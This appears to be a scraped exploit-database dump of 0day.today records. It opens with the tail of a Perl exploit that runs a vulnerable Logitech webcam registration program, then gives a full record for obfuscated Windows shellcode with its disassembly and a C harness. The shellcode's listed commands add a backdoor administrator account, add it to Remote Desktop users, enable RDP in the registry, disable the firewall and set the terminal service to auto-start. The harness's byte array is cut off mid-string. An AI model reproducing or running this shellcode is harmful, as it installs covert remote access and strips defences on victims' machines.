myfile $everything;\r\nclose (myfile);\r\nsystem(\"C:\\\\Program Files\\\\Logitech\\\\Logitech WebCam Software\\\\eReg.exe\"); #run our vulnerable application\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/24236", "hash": "8a92cc830f251a51d37199f5e2318891863524fc7edc6c1ca45989ae5b3a2a1c"}, {"lastseen": "2016-04-20T00:00:14", "references": [], "description": "#Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]\r#length: 1218 bytes\r#Date: 13 January 2015\r#Author: Ali Razmjoo\r#tested On: Windows 7 x64 ultimate\r WinExec => 0x769e2c91\rExitProcess => 0x769679f8\r====================================\rExecute :\rnet user ALI ALI /add\rnet localgroup Administrators ALI /add\rNET LOCALGROUP \"Remote Desktop Users\" ALI /add \rreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f \rnetsh firewall set opmode disable\rsc config termservice start= auto\r====================================\r", "edition": 1, "reporter": "Ali Razmjoo", "published": "2015-01-15T00:00:00", "type": "zdt", "title": "win32/7 x64 ultimate Add Admin ALI/ALI & Enable RDP Obfuscated Shellcode - 1218 bytes", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-15T00:00:00", "href": "http://0day.today/exploit/description/23125", "id": "1337DAY-ID-23125", "sourceData": "/*\r\n#Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]\r\n#length: 1218 bytes\r\n#Date: 13 January 2015\r\n#Author: Ali Razmjoo\r\n#tested On: Windows 7 x64 ultimate\r\n\r\nWinExec => 0x769e2c91\r\nExitProcess => 0x769679f8\r\n====================================\r\nExecute :\r\nnet user ALI ALI /add\r\nnet localgroup Administrators ALI /add\r\nNET LOCALGROUP \"Remote Desktop Users\" ALI /add \r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f \r\nnetsh firewall set opmode disable\r\nsc config termservice start= auto\r\n====================================\r\n\r\n\r\n\r\nAli Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']\r\n\r\nThanks to my friends , Dariush Nasirpour and Ehsan Nezami\r\n\r\n\r\nC:\\Users\\Ali\\Desktop>objdump -D shellcode.o\r\n\r\nshellcode.o: file format elf32-i386\r\n\r\n\r\nDisassembly of section .text:\r\n\r\n00000000 <.text>:\r\n 0:\t31 c0 \txor %eax,%eax\r\n 2:\t50 \tpush %eax\r\n 3:\tb8 41 41 41 64 \tmov $0x64414141,%eax\r\n 8:\tc1 e8 08 \tshr $0x8,%eax\r\n b:\tc1 e8 08 \tshr $0x8,%eax\r\n e:\tc1 e8 08 \tshr $0x8,%eax\r\n 11:\t50 \tpush %eax\r\n 12:\tb9 6d 76 53 52 \tmov $0x5253766d,%ecx\r\n 17:\tba 4d 59 32 36 \tmov $0x3632594d,%edx\r\n 1c:\t31 d1 \txor %edx,%ecx\r\n 1e:\t51 \tpush %ecx\r\n 1f:\tb9 6e 72 61 71 \tmov $0x7161726e,%ecx\r\n 24:\tba 4e 33 2d 38 \tmov $0x382d334e,%edx\r\n 29:\t31 d1 \txor %edx,%ecx\r\n 2b:\t51 \tpush %ecx\r\n 2c:\tb9 6c 75 78 78 \tmov $0x7878756c,%ecx\r\n 31:\tba 4c 34 34 31 \tmov $0x3134344c,%edx\r\n 36:\t31 d1 \txor %edx,%ecx\r\n 38:\t51 \tpush %ecx\r\n 39:\tb9 46 47 57 46 \tmov $0x46574746,%ecx\r\n 3e:\tba 33 34 32 34 \tmov $0x34323433,%edx\r\n 43:\t31 d1 \txor %edx,%ecx\r\n 45:\t51 \tpush %ecx\r\n 46:\tb9 56 50 47 64 \tmov $0x64475056,%ecx\r\n 4b:\tba 38 35 33 44 \tmov $0x44333538,%edx\r\n 50:\t31 d1 \txor %edx,%ecx\r\n 52:\t51 \tpush %ecx\r\n 53:\t89 e0 \tmov %esp,%eax\r\n 55:\tbb 41 41 41 01 \tmov $0x1414141,%ebx\r\n 5a:\tc1 eb 08 \tshr $0x8,%ebx\r\n 5d:\tc1 eb 08 \tshr $0x8,%ebx\r\n 60:\tc1 eb 08 \tshr $0x8,%ebx\r\n 63:\t53 \tpush %ebx\r\n 64:\t50 \tpush %eax\r\n 65:\tbb dc 7a a8 23 \tmov $0x23a87adc,%ebx\r\n 6a:\tba 4d 56 36 55 \tmov $0x5536564d,%edx\r\n 6f:\t31 d3 \txor %edx,%ebx\r\n 71:\tff d3 \tcall *%ebx\r\n 73:\t31 c0 \txor %eax,%eax\r\n 75:\t50 \tpush %eax\r\n 76:\t68 41 41 64 64 \tpush $0x64644141\r\n 7b:\t58 \tpop %eax\r\n 7c:\tc1 e8 08 \tshr $0x8,%eax\r\n 7f:\tc1 e8 08 \tshr $0x8,%eax\r\n 82:\t50 \tpush %eax\r\n 83:\tb9 01 41 60 32 \tmov $0x32604101,%ecx\r\n 88:\tba 48 61 4f 53 \tmov $0x534f6148,%edx\r\n 8d:\t31 d1 \txor %edx,%ecx\r\n 8f:\t51 \tpush %ecx\r\n 90:\tb9 28 47 0d 2f \tmov $0x2f0d4728,%ecx\r\n 95:\tba 5b 67 4c 63 \tmov $0x634c675b,%edx\r\n 9a:\t31 d1 \txor %edx,%ecx\r\n 9c:\t51 \tpush %ecx\r\n 9d:\tb9 03 24 36 21 \tmov $0x21362403,%ecx\r\n a2:\tba 62 50 59 53 \tmov $0x53595062,%edx\r\n a7:\t31 d1 \txor %edx,%ecx\r\n a9:\t51 \tpush %ecx\r\n aa:\tb9 34 41 15 18 \tmov $0x18154134,%ecx\r\n af:\tba 5d 32 61 6a \tmov $0x6a61325d,%edx\r\n b4:\t31 d1 \txor %edx,%ecx\r\n b6:\t51 \tpush %ecx\r\n b7:\tb9 0c 05 1b 25 \tmov $0x251b050c,%ecx\r\n bc:\tba 68 68 72 4b \tmov $0x4b726868,%edx\r\n c1:\t31 d1 \txor %edx,%ecx\r\n c3:\t51 \tpush %ecx\r\n c4:\tb9 2f 27 7b 13 \tmov $0x137b272f,%ecx\r\n c9:\tba 5a 57 5b 52 \tmov $0x525b575a,%edx\r\n ce:\t31 d1 \txor %edx,%ecx\r\n d0:\t51 \tpush %ecx\r\n d1:\tb9 1c 2c 02 3e \tmov $0x3e022c1c,%ecx\r\n d6:\tba 70 4b 70 51 \tmov $0x51704b70,%edx\r\n db:\t31 d1 \txor %edx,%ecx\r\n dd:\t51 \tpush %ecx\r\n de:\tb9 3d 2a 32 4c \tmov $0x4c322a3d,%ecx\r\n e3:\tba 51 45 51 2d \tmov $0x2d514551,%edx\r\n e8:\t31 d1 \txor %edx,%ecx\r\n ea:\t51 \tpush %ecx\r\n eb:\tb9 23 5c 1c 19 \tmov $0x191c5c23,%ecx\r\n f0:\tba 4d 39 68 39 \tmov $0x3968394d,%edx\r\n f5:\t31 d1 \txor %edx,%ecx\r\n f7:\t51 \tpush %ecx\r\n f8:\t89 e0 \tmov %esp,%eax\r\n fa:\tbb 41 41 41 01 \tmov $0x1414141,%ebx\r\n ff:\tc1 eb 08 \tshr $0x8,%ebx\r\n 102:\tc1 eb 08 \tshr $0x8,%ebx\r\n 105:\tc1 eb 08 \tshr $0x8,%ebx\r\n 108:\t53 \tpush %ebx\r\n 109:\t50 \tpush %eax\r\n 10a:\tbb dc 7a a8 23 \tmov $0x23a87adc,%ebx\r\n 10f:\tba 4d 56 36 55 \tmov $0x5536564d,%edx\r\n 114:\t31 d3 \txor %edx,%ebx\r\n 116:\tff d3 \tcall *%ebx\r\n 118:\t31 c0 \txor %eax,%eax\r\n 11a:\t50 \tpush %eax\r\n 11b:\t68 41 41 64 64 \tpush $0x64644141\r\n 120:\t58 \tpop %eax\r\n 121:\tc1 e8 08 \tshr $0x8,%eax\r\n 124:\tc1 e8 08 \tshr $0x8,%eax\r\n 127:\t50 \tpush %eax\r\n 128:\tb9 02 63 6b 35 \tmov $0x356b6302,%ecx\r\n 12d:\tba 4b 43 44 54 \tmov $0x5444434b,%edx\r\n 132:\t31 d1 \txor %edx,%ecx\r\n 134:\t51 \tpush %ecx\r\n 135:\tb9 61 55 6c 3d \tmov $0x3d6c5561,%ecx\r\n 13a:\tba 43 75 2d 71 \tmov $0x712d7543,%edx\r\n 13f:\t31 d1 \txor %edx,%ecx\r\n 141:\t51 \tpush %ecx\r\n 142:\tb9 27 3f 3b 1a \tmov $0x1a3b3f27,%ecx\r\n 147:\tba 54 5a 49 69 \tmov $0x69495a54,%edx\r\n 14c:\t31 d1 \txor %edx,%ecx\r\n 14e:\t51 \tpush %ecx\r\n 14f:\tb9 25 34 12 67 \tmov $0x67123425,%ecx\r\n 154:\tba 4a 44 32 32 \tmov $0x3232444a,%edx\r\n 159:\t31 d1 \txor %edx,%ecx\r\n 15b:\t51 \tpush %ecx\r\n 15c:\tb9 0b 02 1f 19 \tmov $0x191f020b,%ecx\r\n 161:\tba 6e 71 74 6d \tmov $0x6d74716e,%edx\r\n 166:\t31 d1 \txor %edx,%ecx\r\n 168:\t51 \tpush %ecx\r\n 169:\tb9 39 3f 7b 15 \tmov $0x157b3f39,%ecx\r\n 16e:\tba 4d 5a 5b 51 \tmov $0x515b5a4d,%edx\r\n 173:\t31 d1 \txor %edx,%ecx\r\n 175:\t51 \tpush %ecx\r\n 176:\tb9 35 15 03 2a \tmov $0x2a031535,%ecx\r\n 17b:\tba 67 70 6e 45 \tmov $0x456e7067,%edx\r\n 180:\t31 d1 \txor %edx,%ecx\r\n 182:\t51 \tpush %ecx\r\n 183:\tb9 3a 17 75 46 \tmov $0x4675173a,%ecx\r\n 188:\tba 6f 47 55 64 \tmov $0x6455476f,%edx\r\n 18d:\t31 d1 \txor %edx,%ecx\r\n 18f:\t51 \tpush %ecx\r\n 190:\tb9 26 35 0b 1e \tmov $0x1e0b3526,%ecx\r\n 195:\tba 6a 72 59 51 \tmov $0x5159726a,%edx\r\n 19a:\t31 d1 \txor %edx,%ecx\r\n 19c:\t51 \tpush %ecx\r\n 19d:\tb9 2a 2a 06 2a \tmov $0x2a062a2a,%ecx\r\n 1a2:\tba 66 65 45 6b \tmov $0x6b456566,%edx\r\n 1a7:\t31 d1 \txor %edx,%ecx\r\n 1a9:\t51 \tpush %ecx\r\n 1aa:\tb9 1d 20 35 5a \tmov $0x5a35201d,%ecx\r\n 1af:\tba 53 65 61 7a \tmov $0x7a616553,%edx\r\n 1b4:\t31 d1 \txor %edx,%ecx\r\n 1b6:\t51 \tpush %ecx\r\n 1b7:\t89 e0 \tmov %esp,%eax\r\n 1b9:\tbb 41 41 41 01 \tmov $0x1414141,%ebx\r\n 1be:\tc1 eb 08 \tshr $0x8,%ebx\r\n 1c1:\tc1 eb 08 \tshr $0x8,%ebx\r\n 1c4:\tc1 eb 08 \tshr $0x8,%ebx\r\n 1c7:\t53 \tpush %ebx\r\n 1c8:\t50 \tpush %eax\r\n 1c9:\tbb dc 7a a8 23 \tmov $0x23a87adc,%ebx\r\n 1ce:\tba 4d 56 36 55 \tmov $0x5536564d,%edx\r\n 1d3:\t31 d3 \txor %edx,%ebx\r\n 1d5:\tff d3 \tcall *%ebx\r\n 1d7:\t31 c0 \txor %eax,%eax\r\n 1d9:\t50 \tpush %eax\r\n 1da:\tb9 09 4c 7c 5e \tmov $0x5e7c4c09,%ecx\r\n 1df:\tba 38 6c 53 38 \tmov $0x38536c38,%edx\r\n 1e4:\t31 d1 \txor %edx,%ecx\r\n 1e6:\t51 \tpush %ecx\r\n 1e7:\tb9 42 4d 39 14 \tmov $0x14394d42,%ecx\r\n 1ec:\tba 62 62 5d 34 \tmov $0x345d6262,%edx\r\n 1f1:\t31 d1 \txor %edx,%ecx\r\n 1f3:\t51 \tpush %ecx\r\n 1f4:\tb9 7a 24 26 75 \tmov $0x7526247a,%ecx\r\n 1f9:\tba 2d 6b 74 31 \tmov $0x31746b2d,%edx\r\n 1fe:\t31 d1 \txor %edx,%ecx\r\n 200:\t51 \tpush %ecx\r\n 201:\tb9 1d 30 15 28 \tmov $0x2815301d,%ecx\r\n 206:\tba 58 77 4a 6c \tmov $0x6c4a7758,%edx\r\n 20b:\t31 d1 \txor %edx,%ecx\r\n 20d:\t51 \tpush %ecx\r\n 20e:\tb9 7c 2f 57 16 \tmov $0x16572f7c,%ecx\r\n 213:\tba 53 5b 77 44 \tmov $0x44775b53,%edx\r\n 218:\t31 d1 \txor %edx,%ecx\r\n 21a:\t51 \tpush %ecx\r\n 21b:\tb9 42 25 2a 66 \tmov $0x662a2542,%ecx\r\n 220:\tba 2d 4b 59 46 \tmov $0x46594b2d,%edx\r\n 225:\t31 d1 \txor %edx,%ecx\r\n 227:\t51 \tpush %ecx\r\n 228:\tb9 28 2f 0c 5a \tmov $0x5a0c2f28,%ecx\r\n 22d:\tba 4d 4c 78 33 \tmov $0x33784c4d,%edx\r\n 232:\t31 d1 \txor %edx,%ecx\r\n 234:\t51 \tpush %ecx\r\n 235:\tb9 20 2b 26 26 \tmov $0x26262b20,%ecx\r\n 23a:\tba 63 44 48 48 \tmov $0x48484463,%edx\r\n 23f:\t31 d1 \txor %edx,%ecx\r\n 241:\t51 \tpush %ecx\r\n 242:\tb9 08 2b 23 67 \tmov $0x67232b08,%ecx\r\n 247:\tba 66 52 77 34 \tmov $0x34775266,%edx\r\n 24c:\t31 d1 \txor %edx,%ecx\r\n 24e:\t51 \tpush %ecx\r\n 24f:\tb9 49 1c 2e 48 \tmov $0x482e1c49,%ecx\r\n 254:\tba 69 7a 6a 2d \tmov $0x2d6a7a69,%edx\r\n 259:\t31 d1 \txor %edx,%ecx\r\n 25b:\t51 \tpush %ecx\r\n 25c:\tb9 67 67 1d 37 \tmov $0x371d6767,%ecx\r\n 261:\tba 45 47 32 41 \tmov $0x41324745,%edx\r\n 266:\t31 d1 \txor %edx,%ecx\r\n 268:\t51 \tpush %ecx\r\n 269:\tb9 03 33 0d 3b \tmov $0x3b0d3303,%ecx\r\n 26e:\tba 71 45 68 49 \tmov $0x49684571,%edx\r\n 273:\t31 d1 \txor %edx,%ecx\r\n 275:\t51 \tpush %ecx\r\n 276:\tb9 39 6a 3c 2f \tmov $0x2f3c6a39,%ecx\r\n 27b:\tba 55 4a 6f 4a \tmov $0x4a6f4a55,%edx\r\n 280:\t31 d1 \txor %edx,%ecx\r\n 282:\t51 \tpush %ecx\r\n 283:\tb9 37 44 1f 2e \tmov $0x2e1f4437,%ecx\r\n 288:\tba 5a 2d 71 4f \tmov $0x4f712d5a,%edx\r\n 28d:\t31 d1 \txor %edx,%ecx\r\n 28f:\t51 \tpush %ecx\r\n 290:\tb9 34 23 23 3b \tmov $0x3b232334,%ecx\r\n 295:\tba 68 77 46 49 \tmov $0x49467768,%edx\r\n 29a:\t31 d1 \txor %edx,%ecx\r\n 29c:\t51 \tpush %ecx\r\n 29d:\tb9 07 3a 0a 14 \tmov $0x140a3a07,%ecx\r\n 2a2:\tba 73 48 65 78 \tmov $0x78654873,%edx\r\n 2a7:\t31 d1 \txor %edx,%ecx\r\n 2a9:\t51 \tpush %ecx\r\n 2aa:\tb9 14 2e 58 53 \tmov $0x53582e14,%ecx\r\n 2af:\tba 48 6d 37 3d \tmov $0x3d376d48,%edx\r\n 2b4:\t31 d1 \txor %edx,%ecx\r\n 2b6:\t51 \tpush %ecx\r\n 2b7:\tb9 3e 3d 26 32 \tmov $0x32263d3e,%ecx\r\n 2bc:\tba 52 6e 43 46 \tmov $0x46436e52,%edx\r\n 2c1:\t31 d1 \txor %edx,%ecx\r\n 2c3:\t51 \tpush %ecx\r\n 2c4:\tb9 33 3c 35 34 \tmov $0x34353c33,%ecx\r\n 2c9:\tba 5d 48 47 5b \tmov $0x5b47485d,%edx\r\n 2ce:\t31 d1 \txor %edx,%ecx\r\n 2d0:\t51 \tpush %ecx\r\n 2d1:\tb9 36 0e 07 2b \tmov $0x2b070e36,%ecx\r\n 2d6:\tba 58 7a 44 44 \tmov $0x44447a58,%edx\r\n 2db:\t31 d1 \txor %edx,%ecx\r\n 2dd:\t51 \tpush %ecx\r\n 2de:\tb9 3c 10 0a 37 \tmov $0x370a103c,%ecx\r\n 2e3:\tba 49 62 78 52 \tmov $0x52786249,%edx\r\n 2e8:\t31 d1 \txor %edx,%ecx\r\n 2ea:\t51 \tpush %ecx\r\n 2eb:\tb9 24 7c 3b 36 \tmov $0x363b7c24,%ecx\r\n 2f0:\tba 61 31 67 75 \tmov $0x75673161,%edx\r\n 2f5:\t31 d1 \txor %edx,%ecx\r\n 2f7:\t51 \tpush %ecx\r\n 2f8:\tb9 31 3d 3b 27 \tmov $0x273b3d31,%ecx\r\n 2fd:\tba 62 64 68 73 \tmov $0x73686462,%edx\r\n 302:\t31 d1 \txor %edx,%ecx\r\n 304:\t51 \tpush %ecx\r\n 305:\tb9 7f 7d 3d 35 \tmov $0x353d7d7f,%ecx\r\n 30a:\tba 36 33 78 69 \tmov $0x69783336,%edx\r\n 30f:\t31 d1 \txor %edx,%ecx\r\n 311:\t51 \tpush %ecx\r\n 312:\tb9 7c 13 0f 2f \tmov $0x2f0f137c,%ecx\r\n 317:\tba 31 52 4c 67 \tmov $0x674c5231,%edx\r\n 31c:\t31 d1 \txor %edx,%ecx\r\n 31e:\t51 \tpush %ecx\r\n 31f:\tb9 1b 08 35 2d \tmov $0x2d35081b,%ecx\r\n 324:\tba 58 49 79 72 \tmov $0x72794958,%edx\r\n 329:\t31 d1 \txor %edx,%ecx\r\n 32b:\t51 \tpush %ecx\r\n 32c:\tb9 74 3a 1e 21 \tmov $0x211e3a74,%ecx\r\n 331:\tba 2d 65 52 6e \tmov $0x6e52652d,%edx\r\n 336:\t31 d1 \txor %edx,%ecx\r\n 338:\t51 \tpush %ecx\r\n 339:\tb9 16 10 1f 17 \tmov $0x171f1016,%ecx\r\n 33e:\tba 34 58 54 52 \tmov $0x52545834,%edx\r\n 343:\t31 d1 \txor %edx,%ecx\r\n 345:\t51 \tpush %ecx\r\n 346:\tb9 2f 27 0c 6e \tmov $0x6e0c272f,%ecx\r\n 34b:\tba 4e 43 68 4e \tmov $0x4e68434e,%edx\r\n 350:\t31 d1 \txor %edx,%ecx\r\n 352:\t51 \tpush %ecx\r\n 353:\tb9 39 22 5e 50 \tmov $0x505e2239,%ecx\r\n 358:\tba 4b 47 39 70 \tmov $0x7039474b,%edx\r\n 35d:\t31 d1 \txor %edx,%ecx\r\n 35f:\t51 \tpush %ecx\r\n 360:\t89 e0 \tmov %esp,%eax\r\n 362:\tbb 41 41 41 01 \tmov $0x1414141,%ebx\r\n 367:\tc1 eb 08 \tshr $0x8,%ebx\r\n 36a:\tc1 eb 08 \tshr $0x8,%ebx\r\n 36d:\tc1 eb 08 \tshr $0x8,%ebx\r\n 370:\t53 \tpush %ebx\r\n 371:\t50 \tpush %eax\r\n 372:\tbb dc 7a a8 23 \tmov $0x23a87adc,%ebx\r\n 377:\tba 4d 56 36 55 \tmov $0x5536564d,%edx\r\n 37c:\t31 d3 \txor %edx,%ebx\r\n 37e:\tff d3 \tcall *%ebx\r\n 380:\t31 c0 \txor %eax,%eax\r\n 382:\t50 \tpush %eax\r\n 383:\tb8 41 41 41 65 \tmov $0x65414141,%eax\r\n 388:\tc1 e8 08 \tshr $0x8,%eax\r\n 38b:\tc1 e8 08 \tshr $0x8,%eax\r\n 38e:\tc1 e8 08 \tshr $0x8,%eax\r\n 391:\t50 \tpush %eax\r\n 392:\tb9 1e 53 39 3c \tmov $0x3c39531e,%ecx\r\n 397:\tba 6d 32 5b 50 \tmov $0x505b326d,%edx\r\n 39c:\t31 d1 \txor %edx,%ecx\r\n 39e:\t51 \tpush %ecx\r\n 39f:\tb9 04 66 2f 32 \tmov $0x322f6604,%ecx\r\n 3a4:\tba 61 46 4b 5b \tmov $0x5b4b4661,%edx\r\n 3a9:\t31 d1 \txor %edx,%ecx\r\n 3ab:\t51 \tpush %ecx\r\n 3ac:\tb9 19 1e 0d 11 \tmov $0x110d1e19,%ecx\r\n 3b1:\tba 69 73 62 75 \tmov $0x75627369,%edx\r\n 3b6:\t31 d1 \txor %edx,%ecx\r\n 3b8:\t51 \tpush %ecx\r\n 3b9:\tb9 20 41 47 36 \tmov $0x36474120,%ecx\r\n 3be:\tba 45 35 67 59 \tmov $0x59673545,%edx\r\n 3c3:\t31 d1 \txor %edx,%ecx\r\n 3c5:\t51 \tpush %ecx\r\n 3c6:\tb9 2b 05 64 2a \tmov $0x2a64052b,%ecx\r\n 3cb:\tba 47 69 44 59 \tmov $0x59446947,%edx\r\n 3d0:\t31 d1 \txor %edx,%ecx\r\n 3d2:\t51 \tpush %ecx\r\n 3d3:\tb9 10 3f 4f 22 \tmov $0x224f3f10,%ecx\r\n 3d8:\tba 62 5a 38 43 \tmov $0x43385a62,%edx\r\n 3dd:\t31 d1 \txor %edx,%ecx\r\n 3df:\t51 \tpush %ecx\r\n 3e0:\tb9 2a 6f 2a 24 \tmov $0x242a6f2a,%ecx\r\n 3e5:\tba 42 4f 4c 4d \tmov $0x4d4c4f42,%edx\r\n 3ea:\t31 d1 \txor %edx,%ecx\r\n 3ec:\t51 \tpush %ecx\r\n 3ed:\tb9 29 09 1e 5e \tmov $0x5e1e0929,%ecx\r\n 3f2:\tba 47 6c 6a 2d \tmov $0x2d6a6c47,%edx\r\n 3f7:\t31 d1 \txor %edx,%ecx\r\n 3f9:\t51 \tpush %ecx\r\n 3fa:\t89 e0 \tmov %esp,%eax\r\n 3fc:\tbb 41 41 41 01 \tmov $0x1414141,%ebx\r\n 401:\tc1 eb 08 \tshr $0x8,%ebx\r\n 404:\tc1 eb 08 \tshr $0x8,%ebx\r\n 407:\tc1 eb 08 \tshr $0x8,%ebx\r\n 40a:\t53 \tpush %ebx\r\n 40b:\t50 \tpush %eax\r\n 40c:\tbb dc 7a a8 23 \tmov $0x23a87adc,%ebx\r\n 411:\tba 4d 56 36 55 \tmov $0x5536564d,%edx\r\n 416:\t31 d3 \txor %edx,%ebx\r\n 418:\tff d3 \tcall *%ebx\r\n 41a:\t31 c0 \txor %eax,%eax\r\n 41c:\t50 \tpush %eax\r\n 41d:\tb8 41 41 41 6f \tmov $0x6f414141,%eax\r\n 422:\tc1 e8 08 \tshr $0x8,%eax\r\n 425:\tc1 e8 08 \tshr $0x8,%eax\r\n 428:\tc1 e8 08 \tshr $0x8,%eax\r\n 42b:\t50 \tpush %eax\r\n 42c:\tb9 72 2a 05 39 \tmov $0x39052a72,%ecx\r\n 431:\tba 52 4b 70 4d \tmov $0x4d704b52,%edx\r\n 436:\t31 d1 \txor %edx,%ecx\r\n 438:\t51 \tpush %ecx\r\n 439:\tb9 54 3a 05 52 \tmov $0x52053a54,%ecx\r\n 43e:\tba 35 48 71 6f \tmov $0x6f714835,%edx\r\n 443:\t31 d1 \txor %edx,%ecx\r\n 445:\t51 \tpush %ecx\r\n 446:\tb9 29 16 0a 47 \tmov $0x470a1629,%ecx\r\n 44b:\tba 4c 36 79 33 \tmov $0x3379364c,%edx\r\n 450:\t31 d1 \txor %edx,%ecx\r\n 452:\t51 \tpush %ecx\r\n 453:\tb9 27 1b 5b 3e \tmov $0x3e5b1b27,%ecx\r\n 458:\tba 55 6d 32 5d \tmov $0x5d326d55,%edx\r\n 45d:\t31 d1 \txor %edx,%ecx\r\n 45f:\t51 \tpush %ecx\r\n 460:\tb9 33 1a 3b 10 \tmov $0x103b1a33,%ecx\r\n 465:\tba 41 77 48 75 \tmov $0x75487741,%edx\r\n 46a:\t31 d1 \txor %edx,%ecx\r\n 46c:\t51 \tpush %ecx\r\n 46d:\tb9 34 79 3a 12 \tmov $0x123a7934,%ecx\r\n 472:\tba 53 59 4e 77 \tmov $0x774e5953,%edx\r\n 477:\t31 d1 \txor %edx,%ecx\r\n 479:\t51 \tpush %ecx\r\n 47a:\tb9 1d 5c 1e 28 \tmov $0x281e5c1d,%ecx\r\n 47f:\tba 72 32 78 41 \tmov $0x41783272,%edx\r\n 484:\t31 d1 \txor %edx,%ecx\r\n 486:\t51 \tpush %ecx\r\n 487:\tb9 2a 4e 5a 28 \tmov $0x285a4e2a,%ecx\r\n 48c:\tba 59 2d 7a 4b \tmov $0x4b7a2d59,%edx\r\n 491:\t31 d1 \txor %edx,%ecx\r\n 493:\t51 \tpush %ecx\r\n 494:\t89 e0 \tmov %esp,%eax\r\n 496:\tbb 41 41 41 01 \tmov $0x1414141,%ebx\r\n 49b:\tc1 eb 08 \tshr $0x8,%ebx\r\n 49e:\tc1 eb 08 \tshr $0x8,%ebx\r\n 4a1:\tc1 eb 08 \tshr $0x8,%ebx\r\n 4a4:\t53 \tpush %ebx\r\n 4a5:\t50 \tpush %eax\r\n 4a6:\tbb dc 7a a8 23 \tmov $0x23a87adc,%ebx\r\n 4ab:\tba 4d 56 36 55 \tmov $0x5536564d,%edx\r\n 4b0:\t31 d3 \txor %edx,%ebx\r\n 4b2:\tff d3 \tcall *%ebx\r\n 4b4:\tbb 9b 4f d0 30 \tmov $0x30d04f9b,%ebx\r\n 4b9:\tba 63 36 46 46 \tmov $0x46463663,%edx\r\n 4be:\t31 d3 \txor %edx,%ebx\r\n 4c0:\tff d3 \tcall *%ebx\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n \r\nint main(){\r\nunsigned char shellcode[]= \"\\x31\\xc0\\x50\\xb8\\x41\\x41\\x41\\x64\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x6d\\x76\\x53\\x52\\xba\\x4d\\x59\\x32\\x36\\x31\\xd1\\x51\\xb9\\x6e\\x72\\x61\\x71\\xba\\x4e\\x33\\x2d\\x38\\x31\\xd1\\x51\\xb9\\x6c\\x75\\x78\\x78\\xba\\x4c\\x34\\x34\\x31\\x31\\xd1\\x51\\xb9\\x46\\x47\\x57\\x46\\xba\\x33\\x34\\x32\\x34\\x31\\xd1\\x51\\xb9\\x56\\x50\\x47\\x64\\xba\\x38\\x35\\x33\\x44\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xdc\\x7a\\xa8\\x23\\xba\\x4d\\x56\\x36\\x55\\x31\\xd3\\xff\\xd3\\x31\\xc0\\x50\\x68\\x41\\x41\\x64\\x64\\x58\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x01\\x41\\x60\\x32\\xba\\x48\\x61\\x4f\\x53\\x31\\xd1\\x51\\xb9\\x28\\x47\\x0d\\x2f\\xba\\x5b\\x67\\x4c\\x63\\x31\\xd1\\x51\\xb9\\x03\\x24\\x36\\x21\\xba\\x62\\x50\\x59\\x53\\x31\\xd1\\x51\\xb9\\x34\\x41\\x15\\x18\\xba\\x5d\\x32\\x61\\x6a\\x31\\xd1\\x51\\xb9\\x0c\\x05\\x1b\\x25\\xba\\x68\\x68\\x72\\x4b\\x31\\xd1\\x51\\xb9\\x2f\\x27\\x7b\\x13\\xba\\x5a\\x57\\x5b\\x52\\x31\\xd1\\x51\\xb9\\x1c\\x2c\\x02\\x3e\\xba\\x70\\x4b\\x70\\x51\\x31\\xd1\\x51\\xb9\\x3d\\x2a\\x32\\x4c\\xba\\x51\\x45\\x51\\x2d\\x31\\xd1\\x51\\xb9\\x23\\x5c\\x1c\\x19\\xba\\x4d\\x39\\x68\\x39\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xdc\\x7a\\xa8\\x23\\xba\\x4d\\x56\\x36\\x55\\x31\\xd3\\xff\\xd3\\x31\\xc0\\x50\\x68\\x41\\x41\\x64\\x64\\x58\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x02\\x63\\x6b\\x35\\xba\\x4b\\x43\\x44\\x54\\x31\\xd1\\x51\\xb9\\x61\\x55\\x6c\\x3d\\xba\\x43\\x75\\x2d\\x71\\x31\\xd1\\x51\\xb9\\x27\\x3f\\x3b\\x1a\\xba\\x54\\x5a\\x49\\x69\\x31\\xd1\\x51\\xb9\\x25\\x34\\x12\\x67\\xba\\x4a\\x44\\x32\\x32\\x31\\xd1\\x51\\xb9\\x0b\\x02\\x1f\\x19\\xba\\x6e\\x71\\x74\\x6d\\x31\\xd1\\x51\\xb9\\x39\\x3f\\x7b\\x15\\xba\\x4d\\x5a\\x5b\\x51\\x31\\xd1\\x51\\xb9\\x35\\x15\\x03\\x2a\\xba\\x67\\x70\\x6e\\x45\\x31\\xd1\\x51\\xb9\\x3a\\x17\\x75\\x46\\xba\\x6f\\x47\\x55\\x64\\x31\\xd1\\x51\\xb9\\x26\\x35\\x0b\\x1e\\xba\\x6a\\x72\\x59\\x51\\x31\\xd1\\x51\\xb9\\x2a\\x2a\\x06\\x2a\\xba\\x66\\x65\\x45\\x6b\\x31\\xd1\\x51\\xb9\\x1d\\x20\\x35\\x5a\\xba\\x53\\x65\\x61\\x7a\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xdc\\x7a\\xa8\\x23\\xba\\x4d\\x56\\x36\\x55\\x31\\x